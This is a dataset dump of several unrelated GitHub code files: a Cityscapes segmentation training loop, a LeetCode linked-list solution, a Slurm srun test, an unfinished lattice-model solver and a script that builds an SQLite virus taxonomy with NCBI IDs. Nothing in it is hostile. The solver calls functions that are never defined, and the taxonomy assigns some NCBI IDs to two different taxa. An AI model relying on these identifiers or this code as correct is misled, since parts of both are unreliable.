torch.utils.data.DataLoader(self.validset,batch_size=1,shuffle=False, num_workers=4)\n\n return\n\n def cropNflip(self, img, smnt):\n\n crop_size=768\n assert img.size[0] == smnt.size[0]\n assert img.size[1] == smnt.size[1]\n\n if random.random() > 0.5:\n img = TF.hflip(img)\n smnt = TF.hflip(smnt)\n\n W, H = img.size\n x = random.randint(0, W-crop_size-1)\n y = random.randint(0, H-crop_size-1)\n img = TF.crop(img, y, x, crop_size, crop_size)\n smnt = TF.crop(smnt, y, x, crop_size, crop_size)\n\n img = TF.to_tensor(img)\n img = TF.normalize(img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225))\n smnt = torch.round(TF.to_tensor(smnt)*256)\n smnt = self.label(smnt)\n\n return img, smnt\n\n def label(self, smnt):\n\n '''\n class_name class_num\n road 1\n sidewalk 2\n building 3\n wall 4\n fence 5\n pole 6\n traffic light 7\n traffic sign 8\n vegetation 9\n terrain 10\n sky 11\n person 12\n rider 13\n car 14\n truck 15\n bus 16\n train 17\n motorcycle 18\n license plate 19\n others 0\n '''\n\n smnt = torch.where((smnt<7) | (smnt==9) | (smnt==10) | (smnt==14) | (smnt==15) | (smnt==16) | (smnt==18) | (smnt==29) | (smnt==30), torch.zeros(smnt.shape), smnt)\n\n smnt = smnt - 6\n smnt = torch.where(smnt >= 5, smnt-2, smnt)\n smnt = torch.where(smnt >= 9, smnt-3, smnt)\n smnt = torch.where(smnt >= 8, smnt-1, smnt)\n smnt = torch.where(smnt >= 19, smnt-2, smnt)\n smnt = torch.clamp(smnt, min=0)\n\n return smnt\n\n def label_heat_map(self, smnt):\n\n smnt = torch.round(TF.to_tensor(smnt)*256)\n\n return self.label(smnt)\n\n\ndef train(device, use_spatial=True, use_feature=True, d=8, total_epoch=180, init_lr=0.01):\n\n cityscapes = Cityscapes()\n resnet = resnet_with_dgcn(use_spatial, use_feature, d)\n trainloader = cityscapes.trainloader\n\n criterion = nn.CrossEntropyLoss(ignore_index=0).to(device)\n optimizer = optim.SGD(resnet.parameters(), lr=init_lr, momentum=0.9,weight_decay=0.0001)\n resnet.to(device)\n\n print('Training Start')\n for epoch in range(total_epoch):\n\n for i, data in enumerate(trainloader, 0):\n\n try:\n img, semantic = data\n img = img.to(device)\n optimizer.zero_grad()\n\n prediction = resnet(img)['out']\n prediction = prediction.to(device)\n batch, _, H, W = semantic.shape\n semantic = torch.reshape(semantic, (batch, H, W))\n semantic = semantic.long().to(device)\n\n loss = criterion(prediction, semantic)\n optimizer = adaptive_lr(optimizer, epoch, total_epoch, init_lr)\n loss.backward()\n optimizer.step()\n\n if i%100 == 99:\n print(\"[Epoch: %d, Trained Images in Batch: %d] Loss = %f\" % (epoch+1, i+1, loss.item()))\n\n except InterruptedError:\n continue\n\n if (epoch+1)%20 == 0:\n\n torch.save(resnet.state_dict(), './model/resnet_dgcn_epoch_{}.pth'.format(epoch+1))\n\n print('Training Finished')\n\n return\n\n\ndef main():\n\n if not torch.cuda.is_available():\n\n print(\"Training is only for CUDA available environment\")\n return\n\n torch.backends.cudnn.benchmark = True\n device = torch.device('cuda:0')\n torch.cuda.set_device(device)\n train(device)\n\n return\n\n\nif __name__ == \"__main__\":\n\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n sys.exit(main())\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"qpwodlsqp/dgcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45462286105","text":"from queue import PriorityQueue\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\ndef 
build_linked_list(l):\n if not l:\n return\n n = len(l)\n root = node = ListNode(None)\n for idx in range(0, n):\n new_node = ListNode(l[idx])\n node.next = new_node\n node = new_node\n return root.next\n\n\nclass Solution:\n def mergeKLists(self, lists):\n if not lists:\n return\n\n root = node = ListNode(None)\n q = PriorityQueue()\n for idx, l in enumerate(lists):\n if l:\n q.put((l.val, idx))\n while not q.empty():\n min_val, min_idx = q.get()\n new_node = ListNode(min_val)\n node.next = new_node\n node = new_node\n lists[min_idx] = lists[min_idx].next\n if lists[min_idx]:\n q.put((lists[min_idx].val, min_idx))\n return root.next\n\n\nif __name__ == '__main__':\n s = Solution()\n lists = [\n build_linked_list([1, 4, 5]),\n build_linked_list([1, 3, 4]),\n build_linked_list([2, 6])\n ]\n result = s.mergeKLists(lists)\n","repo_name":"yannickkiki/programming-training","sub_path":"Leetcode/python3/23_merge_k_sorted_lists.py","file_name":"23_merge_k_sorted_lists.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"31273978113","text":"import atf\nimport pytest\nimport re\n\n\n# Setup\n@pytest.fixture(scope=\"module\", autouse=True)\ndef setup():\n atf.require_slurm_running()\n\n\ndef test_immediate():\n\n # Spawn a srun immediate execution job with hold (priority==0) option,\n # The job can't run immediately with a priority of zero\n run_error = atf.run_command_error(\"srun --immediate --hold pwd\")\n assert re.search(r'Unable to allocate resources', run_error) is not None\n\n # test that --immediate runs in under 2 seconds\n assert atf.run_command_exit(\"srun --immediate pwd\", timeout=2) == 0\n","repo_name":"SchedMD/slurm","sub_path":"testsuite/python/tests/test_116_11.py","file_name":"test_116_11.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":2074,"dataset":"github-code","pt":"19"} +{"seq_id":"32846274947","text":"def at_boundary_p(pos, m, n):\n x, y = pos\n return x == 0 or x == 2 * m or y == 0 or y == 2 * n\n\n\ndef count_neighbor_filled(pos, state, m, n):\n x, y = pos\n neighbors = get_neighbors(pos, m, n)\n return len([n for n in neighbors if state[n[0], n[1]] != ' '])\n\n\ndef get_neighbor_centers(pos, m, n):\n x, y = pos\n if x == 0:\n return [(x + 1, y)]\n elif x == 2 * m:\n return [(x - 1, y)]\n elif y == 0:\n return [(x, y + 1)]\n elif y == 2 * n:\n return [(x, y - 1)]\n elif y % 2 == 0:\n # on 'vertical lines\n return [(x, y - 1), (x, y + 1)]\n else:\n return [(x - 1, y), (x + 1, y)]\n\n\ndef center_to_vertices(pos):\n x, y = pos\n return [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]\n\n\ndef get_neighbors(pos, m, n):\n x, y = pos\n if x < 0 or x > 2 * m - 1 or y < 0 or y > 2 * n - 1 or (x + y) % 2 == 0:\n raise RuntimeError(\n \"Illegal vertex position ({}, {}). 
Lattice size: {} rows, {} columns.\"\n .format(x, y, m, n))\n return [\n z for z in sum(\n map(center_to_vertices, get_neighbor_centers(pos, m, n)), [])\n if (not z == pos)\n ]\n\n\n# * algorithm\n# given boundary conditions:\n# - locate_target :: among the vertices with most number of neighbors, choose the *left* most in *down* most one\n# TODO: prove by induction {min max # neighbor = 2}\n# - if it has 3 neighbors, it is automatically determined.\n# goto locate_target\n# - if it has 2 neighbors, split into 2 subroutines\n\n\ndef get_left_most_in_down_compare_gt(pos1, pos2):\n x1, y1 = pos1\n x2, y2 = pos2\n if y1 < y2:\n return 1\n elif y1 > y2:\n return -1 # y1 = y2 below\n elif x1 < x2:\n return 1\n elif x1 > x2:\n return -1\n else:\n return 0\n\n\ndef max_elem_with_cmp(lst, gt_fn):\n if len(lst) < 1:\n raise RuntimeError(\"max_elem_with_cmp: lst shouldn't be empty.\")\n elif len(lst) == 1:\n return lst[0]\n\n max_elem = lst[0]\n for n in range(1, len(lst)):\n if gt_fn(lst[n], max_elem) == 1:\n max_elem = lst[n]\n\n return max_elem\n\n\ndef get_left_most_in_down_most(lst):\n return max_elem_with_cmp(lst, get_left_most_in_down_compare_gt)\n\n\ndef vertex_p(pos, m, n):\n x, y = pos\n return 0 <= x and x <= 2 * m and 0 <= y and y <= 2 * n and (x + y) % 2 == 1\n\n\ndef filled_p(pos, state, m, n):\n x, y = pos\n if (not (vertex_p(pos, m, n))):\n raise RuntimeError(\"filled_p: pos isn't a vertex!\")\n\n content = state[x, y]\n return content == 2 or content == 1\n\n\ndef get_unfilled_with_most_filled_neighbors(unfilled, state, m, n):\n num_filled_neighbors_dict = {}\n num_filled_neighbors = []\n for p in unfilled:\n num = len(\n [q for q in get_neighbors(p, m, n) if filled_p(q, state, m, n)])\n num_filled_neighbors_dict[p] = num\n num_filled_neighbors.append(num)\n\n max_num = max(num_filled_neighbors)\n return [p for p in unfilled if num_filled_neighbors_dict[p] == max_num]\n\n\n# TODO: implement this\ndef inspect(state, pos, nc, pieces, m, n):\n \"\"\"According to given pieces, list all possibilities of filling\n the pieces centered at nc.\n Return dict of {pos, char to fill in there}.\n \"\"\"\n cx, cy = nc\n unfilled = [\n p for p in [(cx - 1, cy), (cx, cy + 1), (cx, cy - 1), (cx + 1, cy)]\n if (not filled_p(p, state, m, n))\n ]\n\n unfilled_num = len(unfilled)\n\n if unfilled_num == 0:\n raise RuntimeError(\n \"expecting to fill a pieces, but it has already been filled.\")\n elif unfilled_num == 1:\n pass\n else:\n return {} # give up (unfilled_num > 2:)\n\n pass\n\n\ndef maybe_fill_new(state, pos, pieces, m, n):\n neighbor_center_one_or_two = get_neighbor_centers(pos, m, n)\n\n nc_num = len(neighbor_center_one_or_two)\n if nc_num == 1:\n debug_output(\"pos: {}\".format(pos))\n debug_output(\"m, n: {}, {}\".format(m, n))\n raise RuntimeError(\n \"Attempt to fill a vertex with only one neighbor center. 
Currently no support for incomplete boundary condition.\"\n        )\n\n    # then we assume nc_num = 2, and should look at the two neighboring pieces\n    for nc in neighbor_center_one_or_two:\n        inspect(state, pos, nc, pieces, m, n)\n\n    pass\n\n\ndef some_test(state, m, n):\n    \"\"\"test unfilled_positions,\n    get_unfilled_with_most_filled_neighbors and\n    get_left_most_in_down_most.\n\n    \"\"\"\n    import copy  # local import; this module has no top-level imports\n\n    state_clone = copy.deepcopy(state)\n    unfilled_ = unfilled_positions(state_clone, m, n)\n    unfilled = get_unfilled_with_most_filled_neighbors(unfilled_, state_clone,\n                                                       m, n)\n    pos = get_left_most_in_down_most(unfilled)\n    print(\"[debug], pos: {}\".format(pos))\n    for p in unfilled:\n        state_clone[p[0], p[1]] = 2\n    render(state_clone, m, n)\n","repo_name":"w9DhSc/naive-lattice-model-solver","sub_path":"smarter.py","file_name":"smarter.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"721014433","text":"# todo consider using https://github.com/etetoolkit/ete , http://etetoolkit.org/\n# A Python framework for the analysis and visualization of trees.\n# http://etetoolkit.org/cookbook/ete_build_basics.ipynb\n\n\nfrom pathlib import Path\nimport logging\n\nlogging.info('tk...')\nfrom tkinter import filedialog\n\nimport datetime\n\nlogging.info('sqlite3...')\nimport sqlite3\n\n# http://biopython.org/\nlogging.info('Bio...')\nfrom Bio import SeqIO\nfrom Bio import GenBank # too ?\n#import BioSQL\n#from BioSQL import BioSeqDatabase\n\n#import PyQt5\n#class RefSchema\n\n\nclass CreateTaxa:\n    def __init__(self, db, superkingdom_name, root_taxa_name, NCBI_TaxID = None, syn=None):\n        self.db=db\n        self.c = db.cursor()\n        self.kingdom = superkingdom_name\n        self.root_rank = self._root_rank('superkingdom', superkingdom_name)\n        self.root_taxa = self._root_taxa(root_taxa_name, root_taxa_name, NCBI_TaxID)\n\n    def _root_rank (self, name, kingdom): # todo: NCBI ? add kingdom ! determine type of rank.\n        self.c.execute(\"INSERT INTO taxa_rank (Name, kingdom )\"\n                       \" VALUES (? , ? )\",\n                       ( name, kingdom ) )\n        self.root_rank = self.c.lastrowid\n        return self.root_rank\n\n    def _root_taxa (self, name, vulgar, NCBI_TaxID = None, syn=None):\n        self.c.execute(\"INSERT INTO taxa (Name , vulgar, Id_rank , NCBI_TaxID )\"\n                       \" VALUES ( ? , ? , ? , ? )\",\n                       (name , vulgar, self.root_rank, NCBI_TaxID))\n        self.root_taxa = self.c.lastrowid\n        self.c.execute(\"INSERT INTO taxa_parents (Id_taxa , parent , Id_rank )\"\n                       \" VALUES ( ? , ? , ? )\",\n                       (self.root_taxa , self.root_taxa, self.root_rank))\n        self.synonyms(self.root_taxa, [name, vulgar, NCBI_TaxID])\n        if syn: self.synonyms(self.root_taxa, syn)\n        return self.root_taxa\n\n    def rank (self, name, parent_rank):\n        self.c.execute(\"INSERT INTO taxa_rank (Name, kingdom , parent )\"\n                       \" VALUES (? , ? , ? )\",\n                       ( name, self.kingdom, parent_rank ) )\n        return self.c.lastrowid\n\n    def taxa (self, name, vulgar, rank, parent_taxa, NCBI_TaxID = None, syn=None):\n\n        self.c.execute(\"INSERT INTO taxa (Name, vulgar, Id_rank, parent , NCBI_TaxID )\"\n                       \" VALUES (? , ? , ? , ? , ? )\",\n                       (name, vulgar , rank , parent_taxa, NCBI_TaxID))\n        Id_taxa=self.c.lastrowid\n        self.c.execute(\"INSERT INTO taxa_parents (Id_taxa, parent, Id_rank )\"\n                       \" VALUES ( ? , ? , ? )\",\n                       (Id_taxa , Id_taxa, rank ) )\n
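        # taxa_parents is kept as a transitive closure: besides the self-row\n        # inserted above, every ancestor row of the parent is copied for the\n        # new taxon (next statement), so subtree queries need no recursion.\n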
, parent, Id_rank \"\n \"FROM taxa_parents WHERE Id_taxa=?\", (Id_taxa , parent_taxa ) )\n\n self.synonyms(Id_taxa, [name, vulgar, NCBI_TaxID])\n if syn: self.synonyms(Id_taxa, syn)\n return Id_taxa\n\n def synonyms(self, Id_taxa, names):\n if isinstance(names, str):\n names=[names]\n for name in names:\n if not name: continue\n self.c.execute(\"INSERT INTO taxa_names (Id_taxa, Name )\"\n \" VALUES ( ? , ? )\",\n (Id_taxa, name ) )\n\n\ndef rank_ID(db_cursor, rank_name):\n db_cursor.execute(\"SELECT Id_rank FROM taxa_rank WHERE Name=?\", (rank_name,))\n return db_cursor.fetchone()[0]\n\n\ndef rank_ID_taxa(db_cursor, Id_taxa):\n db_cursor.execute(\"SELECT Id_rank FROM taxa WHERE Id_taxa=?\", (Id_taxa,))\n return db_cursor.fetchone()[0]\n\n#def createBioSQL(newly) -> sqlite3.Connection:\n#\n# server = BioSeqDatabase.open_database(driver=\"sqlite3\", db=\"HEV\")\n# try:\n# db = server[\"HEV\"]\n# except KeyError:\n# db = server.new_database(\"HEV\",\n# description=\"For testing GBrowse\")\n #db = sqlite3.connect(\"../data/temp/BioSQL.db\")\n #if newly:\n #read_create(db)\n #print('Adding default taxas...')\n #add_def_taxa(db)\n #print('Adding reference schemes...')\n #add_ref_schema(db)\n #db.commit()\n#\n# return db\n#\n#def read_createBioSQL(db):\n# with open(\"biosqldb-sqlite.sql\") as dbcreate:\n# sql_create = dbcreate.read()\n# c = db.cursor()\n# c.executescript(sql_create)\n\n\ndef create(newly: bool, file_name: Path=None) -> sqlite3.Connection:\n if file_name is None:\n file_name = Path(\"../data/temp/seq.db\")\n db = sqlite3.connect(file_name)\n if newly:\n read_create(db)\n print('Adding default taxas...')\n add_def_taxa(db)\n print('Adding reference schemes...')\n add_ref_schema(db)\n db.commit()\n\n return db\n\n\ndef read_create(db):\n logging.info(\"executescript create_seq.sql\")\n with open(\"create_seq.sql\") as dbcreate:\n sql_create = dbcreate.read()\n c = db.cursor()\n c.executescript(sql_create)\n\n\ndef read_country_codes(db):\n with open(\"country_codes.sql\") as dbcreate:\n sql_create = dbcreate.read()\n c = db.cursor()\n c.executescript(sql_create)\n db.commit()\n\n\ndef add_ref_schema(db):\n c = db.cursor()\n for sch in [('Lu' , 'Lu, Li, 2006' ),\n ('VR' , 'Vina-Rodriguez, 2015' ),\n ('ICVT', 'ICVT, 2016' ) ] :\n c.execute(\"INSERT INTO ref_schema (schema, name) VALUES (?, ?)\", sch)\n\n\ndef add_def_taxa(db):\n # todo evaluate if partially reconstruct from https://ftp.ncbi.nlm.nih.gov/pub/taxonomy/new_taxdump/\n # todo by extracting all the info from all descendant from a given taxa, for example 291484: family Hepeviridae\n # see also http://etetoolkit.org/docs/2.3/tutorial/tutorial_ncbitaxonomy.html\n # https://ftp.ncbi.nlm.nih.gov/pub/taxonomy/new_taxdump/taxdump_readme.txt\n # https://github.com/etetoolkit/ete/blob/master/ete3/ncbi_taxonomy/ncbiquery.py\n\n ct = CreateTaxa(db,\n superkingdom_name = 'Viruses',\n root_taxa_name = 'Viridae',\n NCBI_TaxID = '10239',\n syn = ['Viridae', 'Vira','viruses'])\n\n realm = ct.rank(name='Realm', parent_rank=ct.root_rank) # no rank at NCBI\n Riboviria = ct.taxa(name = 'Riboviria',\n vulgar = 'RNA viruses',\n rank = realm,\n parent_taxa = ct.root_taxa,\n NCBI_TaxID = '439488')\n\n phylum = ct.rank(name='phylum', parent_rank=realm)\n Negarnaviricota = ct.taxa(name = 'Negarnaviricota',\n vulgar = '',\n rank = phylum,\n parent_taxa = Riboviria,\n NCBI_TaxID = '2497569')\n\n subphylum = ct.rank(name='subphylum', parent_rank=phylum)\n Polyploviricotina = ct.taxa(name = 'Polyploviricotina',\n vulgar = '',\n rank = subphylum,\n 
parent_taxa = Negarnaviricota,\n NCBI_TaxID = '2497571')\n\n Class = ct.rank(name='class', parent_rank=subphylum)\n Ellioviricetes = ct.taxa(name = 'Ellioviricetes',\n vulgar = '',\n rank = Class,\n parent_taxa = Polyploviricotina,\n NCBI_TaxID = '2497576')\n\n order = ct.rank(name='Order', parent_rank=Class)\n Bunyavirales = ct.taxa(name = 'Bunyavirales',\n vulgar = 'Bunyavirales',\n rank = order,\n parent_taxa = Ellioviricetes,\n NCBI_TaxID = '1980410')\n\n family = ct.rank(name='family', parent_rank=order)\n subfamily = ct.rank(name='subfamily', parent_rank=family)\n\n Arenaviridae = ct.taxa('Arenaviridae' , 'Arenaviridae', family, Bunyavirales, '11617')\n Hantaviridae = ct.taxa('Hantaviridae' , 'Hantaviridae', family, Bunyavirales, '1980413')\n Nairoviridae = ct.taxa('Nairoviridae' , 'Nairoviridae', family, Bunyavirales, '1980415')\n Peribunyaviridae = ct.taxa('Peribunyaviridae' , 'Peribunyaviridae', family, Bunyavirales, '1980416')\n Phenuiviridae = ct.taxa('Phenuiviridae' , 'Phenuiviridae', family, Bunyavirales, '1980418')\n\n tHEV = ct.taxa('Hepeviridae', 'HEV' , family, Riboviria, '291484',\n syn=['2021911', '1009842', '172851', '2021912', '2021913', '2021914', '1216472', '996468',\n '1638959', '1638960', '1674928', '1530451', '1328106', '1229326', '879095', '301242'])\n\n # 172851 Avian hepatitis E virus, 2021912 Barns Ness breadcrumb sponge hepe-like virus 2,\n # 2021913, Barns Ness breadcrumb sponge hepe-like virus 3, 2021914 Barns Ness breadcrumb sponge hepe-like virus 4\n # 1216472, Bat hepevirus; 996468 Hepatitis E virus rat/USA/2003; 1638959 Mystacina/New Zealand/2013/3\n # 1638960 Mystacina/New Zealand/2013; 1674928 seal/AAUST73/BR/2012 ; 1530451 Fesavirus 2; 1328106 Fox\n # 1229326 Hepelivirus; 879095 rat/R68/DEU/2009; 301242 Big liver and spleen disease virus\n\n genus = ct.rank(name='genus', parent_rank=subfamily)\n Orthobunyavirus = ct.taxa('Orthobunyavirus', 'Bunyavirus', genus, Peribunyaviridae, '11572', syn=['Bunyaviruses']) # syn ?\n Orthonairovirus_genus = ct.taxa('Orthonairovirus', 'Nairovirus', genus, Nairoviridae, '1980517')\n Phlebovirus = ct.taxa('Phlebovirus', 'Phlebovirus', genus, Phenuiviridae, '11584')\n\n tOrthHEV= ct.taxa('Orthohepevirus', 'Orthohepevirus' , genus, tHEV, '1678141', syn=['12461', 'Hepatitis E virus','186677', 'Hepevirus'])\n tPisci = ct.taxa('Piscihepevirus', 'Piscihepevirus' , genus, tHEV, '1678142')\n\n species = ct.rank('species', parent_rank=genus)\n subspecies = ct.rank('species', parent_rank=species)\n\n tBySp = ct.taxa('Bunyamwera orthobunyavirus', 'Bunyamwera orthobunyavirus' , species, Orthobunyavirus, '1933179')\n tByVr = ct.taxa('Bunyamwera virus', 'Bunyamwera serogroup' , subspecies, tBySp, '35304', syn=['Bunyamwera virus group', 'Bunyamwera bunyavirus group'])\n tBtVr = ct.taxa('Batai virus', 'Batai' , subspecies, tBySp, '80942' )\n\n # Orthonairovirus_genus species\n # Serogroup Crimean-Congo hemorrhagic fever\n CCHFV_Sp = ct.taxa('Crimean-Congo hemorrhagic fever orthonairovirus', 'CCHFV', species, Orthonairovirus_genus, '1980519', syn=['402369', '402370', '402371']) # and many more <--- actually subCC # JF807432.1, JF523542.1 seg-L 258, 490 = but - to different\n HAZV_Sp = ct.taxa('Hazara orthonairovirus', 'HAZV', species, Orthonairovirus_genus, '1980522', syn=['11596', '11597']) # <--- actually subHAZ ?\n TFLV_Sp = ct.taxa('Tofla orthonairovirus', 'TFLV', species, Orthonairovirus_genus, '1615758') # not official. 
NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n # Serogroup Dera Ghazi Khan\n DGKV_Sp = ct.taxa('Dera Ghazi Khan orthonairovirus', 'DGKV', species, Orthonairovirus_genus, '1980520')\n AHV_Sp = ct.taxa('Abu Hammad virus', 'AHV', subspecies, DGKV_Sp, '248058')\n AMV_Sp = ct.taxa('Abu Mina virus', 'AMV', subspecies, DGKV_Sp, '248059')\n\n # Serogroup Hughes\n HUGV_Sp = ct.taxa('Hughes orthonairovirus', 'HUGV', species, Orthonairovirus_genus, '248053')\n FARV_Sp = ct.taxa('Farallon virus', 'FARV', subspecies, HUGV_Sp, '248059')\n PSV_Sp = ct.taxa('Punta salinas virus', 'PSV', subspecies, HUGV_Sp, '248056')\n RAZAV_Sp = ct.taxa('Raza virus', 'RAZAV', subspecies, HUGV_Sp, '248054')\n SOLV_Sp = ct.taxa('Soldado virus', 'SOLV', subspecies, HUGV_Sp, '426791')\n # Zirqa (ZIRV)\n CASV_Sp = ct.taxa('Caspiy orthonairovirus', 'CASV', species, Orthonairovirus_genus, '1453405') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n # Serogroup Sakhalin\n SAKV_Sp = ct.taxa('Sakhalin orthonairovirus', 'SAKV', species, Orthonairovirus_genus, '1980528')\n TILV_Sp = ct.taxa('Tillamook virus', 'TILV', subspecies, SAKV_Sp, '37297')\n CMV_Sp = ct.taxa('Clo Mor virus', 'CMV', subspecies, SAKV_Sp, '1810952')\n Taggert_Sp = ct.taxa('Taggert virus', 'Taggert', subspecies, SAKV_Sp, '487050')\n PMRV_Sp = ct.taxa('Paramushir orthonairovirus', 'PMRV', species, Orthonairovirus_genus, '1453409') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n AVAV_Sp = ct.taxa('Avalon orthonairovirus', 'AVAV', species, Orthonairovirus_genus, '1810950') # not official. NCBI parent: no rank - unclassified viruses - 12429\n\n\n # Serogroup Nairobi sheep disease\n NSDV_Sp = ct.taxa('Nairobi sheep disease orthonairovirus', 'NSDV', species, Orthonairovirus_genus, '1980526', syn=['194540'])\n KUPV_Sp = ct.taxa('Kupe virus', 'KUPV', subspecies, NSDV_Sp, '498356')\n # Ganjam (GANV) strain ??\n DUGV_Sp = ct.taxa('Dugbe orthonairovirus', 'DUGV', species, Orthonairovirus_genus, '1980521')\n\n\n # Serogroup Qalyub\n QYBV_Sp = ct.taxa('Qalyub orthonairovirus', 'QYBV', species, Orthonairovirus_genus, '1980527')\n BDAV_Sp = ct.taxa('Bandia virus', 'BDAV', subspecies, QYBV_Sp, '248060')\n CHIMV_Sp = ct.taxa('Chim orthonairovirus', 'CHIMV', species, Orthonairovirus_genus, '2170062')\n GERV_Sp = ct.taxa('Geran orthonairovirus', 'GERV', species, Orthonairovirus_genus, '1453407') # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n\n\n # Serogroup Thiafora\n TFAV_Sp = ct.taxa('Thiafora orthonairovirus', 'TFAV', species, Orthonairovirus_genus, '1980529')\n ERVV_Sp = ct.taxa('Erve virus', 'ERVV', subspecies, TFAV_Sp, '248062')\n\n # Serogroup Issyk-kul\n # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n ISKV_Sp = ct.taxa('Issyk-kul orthonairovirus', 'ISKV', species, Orthonairovirus_genus, '1453408')\n GOSV_Sp = ct.taxa('Gossas orthonairovirus', 'GOSV', species, Orthonairovirus_genus, '1714376')\n UZAV_Sp = ct.taxa('Uzun Agach orthonairovirus', 'UZAV', species, Orthonairovirus_genus, '1523052')\n\n # Serogroup Kasokero\n KKOV_Sp = ct.taxa('Kasokero orthonairovirus', 'KKOV', species, Orthonairovirus_genus, '1980524', syn=['1712570'])\n Kasokero_Sp = ct.taxa('Kasokero virus', 'Kasokero', subspecies, KKOV_Sp, '1712570')\n # not official. 
NCBI parent: no rank - unclassified Nairovirus - 1340802\n LPHV_Sp = ct.taxa('Leopards Hill orthonairovirus', 'LPHV', species, Orthonairovirus_genus, '1381104')\n YOGV_Sp = ct.taxa('Yogue orthonairovirus', 'YOGV', species, Orthonairovirus_genus, '1712572')\n\n # Serogroup Burana\n BURV_Sp = ct.taxa('Burana orthonairovirus', 'BURV', species, Orthonairovirus_genus, '1980518') # not official?\n Tacheng_Sp = ct.taxa('Tacheng Tick virus', 'Tacheng', subspecies, BURV_Sp, '1608083')\n TDYV_Sp = ct.taxa('Tamdy orthonairovirus', 'TDYV', species, Orthonairovirus_genus, '2170063', syn=['1453410']) # 1453410: unclassified Nairovirus\n Burana_Sp = ct.taxa('Burana virus', 'Burana', subspecies, TDYV_Sp, '1453404')\n\n Artashat_Sp = ct.taxa('Artashat orthonairovirus', 'Artashat', species, Orthonairovirus_genus, '2170061')\n Keterrah_Sp = ct.taxa('Keterrah orthonairovirus', 'Keterrah', species, Orthonairovirus_genus, '1980525', syn=['1712571'])\n Qalyub_Sp = ct.taxa('Qalyub orthonairovirus', 'Qalyub', species, Orthonairovirus_genus, '1980527')\n # Estero Real orthonairovirus : https://talk.ictvonline.org//taxonomy/p/taxonomy-history?taxnode_id=201850107\n # Estero Real orthobunyavirus : https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?name=Estero+Real+virus\n EsteroReal_Sp= ct.taxa('Estero Real orthonairovirus', 'Estero Real', species, Orthonairovirus_genus, '2170057')\n # not official. NCBI parent: no rank - unclassified Nairovirus - 1340802\n Bat_Sp = ct.taxa('Bat orthonairovirus', 'Bat', species, Orthonairovirus_genus, '1340803')\n Beiji_Sp = ct.taxa('Beiji orthonairovirus', 'Beiji', species, Orthonairovirus_genus, '2304647')\n Grotenhout_Sp = ct.taxa('Grotenhout orthonairovirus', 'Grotenhout', species, Orthonairovirus_genus, '1971396') # too different. L:14,854, M:0, L:3728\n Nayun_Sp = ct.taxa('Nayun tick orthonairovirus', 'Nayun', species, Orthonairovirus_genus, '1610817')\n Norway_Sp = ct.taxa('Norway nairovirus 1 orthonairovirus', 'Norway nairovirus 1', species, Orthonairovirus_genus, '2034329')\n Pacific_Sp = ct.taxa('Pacific coast tick orthonairovirus', 'Pacific coast tick nairovirus', species, Orthonairovirus_genus, '1977074') # to long: M\n Pustyn_Sp = ct.taxa('Pustyn orthonairovirus', 'Pustyn', species, Orthonairovirus_genus, '1857750')\n Saphire_Sp = ct.taxa('Saphire II orthonairovirus', 'Saphire II virus', species, Orthonairovirus_genus, '1815512')\n SouthBay_Sp = ct.taxa('South Bay orthonairovirus', 'South Bay virus', species, Orthonairovirus_genus, '1526514')\n Uzun_Sp = ct.taxa('Uzun Agach orthonairovirus', 'Uzun Agach virus', species, Orthonairovirus_genus, '1523052')\n Vinegar_Sp = ct.taxa('Vinegar Hill orthonairovirus','Vinegar Hill virus',species, Orthonairovirus_genus,'2059308')\n\n # HEV\n tOrthSpcA= ct.taxa('Orthohepevirus A', 'Orthohepevirus A' , species, tOrthHEV, '1678143', syn=[ 'Swine hepatitis E virus', '63421']) # ?? 
syn??\n ct.synonyms(tOrthSpcA, '12461')\n tOrthSpcB= ct.taxa('Orthohepevirus B', 'Orthohepevirus B' , species, tOrthHEV, '1678144') # NCBI_ID tentative !!\n tOrthSpcC= ct.taxa('Orthohepevirus C', 'Orthohepevirus C' , species, tOrthHEV, '1678145', syn=['879096', '1414752']) # rat/R63/DEU/2009, Mink\n tOrthSpcD= ct.taxa('Orthohepevirus D', 'Orthohepevirus D' , species, tOrthHEV, '1678146')\n\n\n tPisciSpcA=ct.taxa('Piscihepevirus A', 'Piscihepevirus A' , species, tPisci,'1678146', syn=['1016879']) # Cutthroat trout virus\n\n rGenotype = ct.rank('genotype', species)\n g1 = ct.taxa('1', 'HEV-g1' , rGenotype, tOrthSpcA, '185579', syn=['I', 'GI', 'G1', 'One'] )\n g2 = ct.taxa('2', 'HEV-g2' , rGenotype, tOrthSpcA, syn=['II'] )\n g3 = ct.taxa('3', 'HEV-g3' , rGenotype, tOrthSpcA, '509628', syn=['G3', 'III', 'Gt3', 'g3', 'HEV-3', 'third', 'GIII']) # , 'Hepatitis E virus type 3'\n g4 = ct.taxa('4', 'HEV-g4' , rGenotype, tOrthSpcA, '185580',\n syn=['IV', '689698', '689699', '689700', '689701', '689702', '689703', '4(IV)']) # Hu/03858/HKG/2009, Hu/07598/HKG/2006\n g5 = ct.taxa('5', 'HEV-g5' , rGenotype, tOrthSpcA, syn=['V'] )\n g6 = ct.taxa('6', 'HEV-g6' , rGenotype, tOrthSpcA, syn=['VI'] )\n g7 = ct.taxa('7', 'HEV-g7' , rGenotype, tOrthSpcA, syn=['VII', 'HEV-7' ] )\n\n gC1 = ct.taxa('C1', 'HEV-C1' , rGenotype, tOrthSpcC )\n gC2 = ct.taxa('C2', 'HEV-C2' , rGenotype, tOrthSpcC, syn=['1213422', 'Ferret hepatitis E virus'] )\n\n 